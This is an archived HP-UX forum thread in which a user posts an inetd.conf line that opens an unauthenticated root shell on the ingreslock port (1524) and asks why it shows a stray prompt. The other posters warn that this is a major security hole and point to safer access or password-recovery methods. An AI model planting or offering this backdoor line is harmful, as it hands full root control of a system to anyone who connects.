topic Re: inetd.conf in Operating System - HP-UX

inetd.conf

vulgate_1 — Sat, 13 Nov 2004 09:06:03 GMT

i wanna add a backdoor in my hp unix .
oneway is:

add one line (below) into inetd.conf

ingreslock stream tcp nowait root /bin/sh sh -i

this function is when system startup
then start a network service at port 1524(ingreslock was defined in /etc/services,if the file dont include it ,u can add it)

kill inetd and startup inetd

command:
telnet ip 1524

now u have a root shell~

but my problem is:
cant remove the prompt ' ^M '

i look up it via google,
the result is
if which u add like that

ingreslock stream tcp nowait root /bin/sh

the system whill prompt
^M

but like

ingreslock stream tcp nowait root /bin/sh
sh -i

all is ok~

why ,why ,why?

reference

http://project.honeynet.org/scans/scan20/sol/1/

Re: inetd.conf

Geoff Wild — Sat, 13 Nov 2004 10:51:54 GMT

Sorry - don't know how to fix your issue - but I have a question for you - why on earth would you do this???

Talk about a major security breach!

I pray your server isn't on the internet - cause just about every hacker in the known universe knows that back door....

There's no need for a back door - ever...if you tried that at just about any security aware company - they would fire you....

You should install Bastille:

http://www.software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6849AA

Rgds...Geoff

Re: inetd.conf

Sridhar Bhaskarla — Sun, 14 Nov 2004 01:20:19 GMT

Hi,

'sh -i' tells how 'sh' is to be executed. Moreover I am not sure if it is even going to work if you don't specify the arguments on HP-UX implementation (your first attempt). Shell gives prompt only if it is executed with -i option or if it has a tty associated. 'man sh-posix'. It's not designed to run through inetd unlike telnetd/ftpd etc., So, I am not sure if you are going to get 'full' shell capabilities.

As said before, my question back to you is 'why, why, why' would you want to configure it that way intentionally?. The first thing any hacker would do is to 'scan' through all the open ports and connect to them to see if they get any response. And this is a red carpet to them.

-Sri

Re: inetd.conf

Steven E. Protter — Sun, 14 Nov 2004 03:15:34 GMT

That is a Solaris doc as I'm sure you are aware. It may create a stable back door on a Solaris machine, but more likely will create a whole big enough for a M1A2 Abrahms tank to drive through.

I'm glad it isn't working on HP-UX.

This kind of thing should not work, not should it be tried.

I can tell you a dozen safe ways to create a backdoor for root access on an HP-UX system. They'd be reasonably scure so long as the unpriviledged user with access to them had a complex password and didn't share.

Tell me what you are trying to accomplish and I may post further relavent advice.

SEP

Re: inetd.conf

vulgate_1 — Sun, 14 Nov 2004 23:09:57 GMT

thank everyone replay my post
now i answer the question

why why why?

i wanna open a backdoor in this machine~

but i dont know how to do

note: this machin belong to me
not belong to any other one~

who can help me
mailto:vulgatecn@msn.com
thank u~

Re: inetd.conf

Ivajlo Yanakiev — Mon, 15 Nov 2004 03:08:33 GMT

You can use ssh or telnet :)
If you want you can change Well know port.
Example you can start your ssh on port 1345
also you can start ssh from /etc/inetd.conf

Re: inetd.conf

Tim D Fulford — Mon, 15 Nov 2004 08:08:27 GMT

I dont understand, If the system is yours why do you need a back door? If you are worried about someone hacking in and changing root password and so forth strengthen the systems security dont reduce it.

You also mentioed that this is your system. This means you take responsibility for all mallicious hacks and problems on the system.

If the system keeps freezing and you need another way in (i.e. telnet) I'd suggest tuning the system such that it does not freeze.

If you keep getting locked out for what ever reason, dont make it easy for yourself to hack in, make it hard to lock yourself out in the first place.

Tim & his 0.02â ¬ wort

Re: inetd.conf

Sridhar Bhaskarla — Mon, 15 Nov 2004 08:34:26 GMT

Hi,

I will be surprized if anyone posts a 'solution' for you. These forums are intended to fix the stuff not to break. Hacking (whatever you call it) is not encouraged here, that atleast I have seen so far.

-Sri

Re: inetd.conf

Geoff Wild — Mon, 15 Nov 2004 09:45:53 GMT

The back door is simple - if you forget root password, TOC the box, then when it say hit any key to interupt the boot sequence - hit a key.

bo pri

Interact with IPL: Y

ISL> hpux -is

That will take you to single user mode - then you can reset the root pass word.

Rgds...Geoff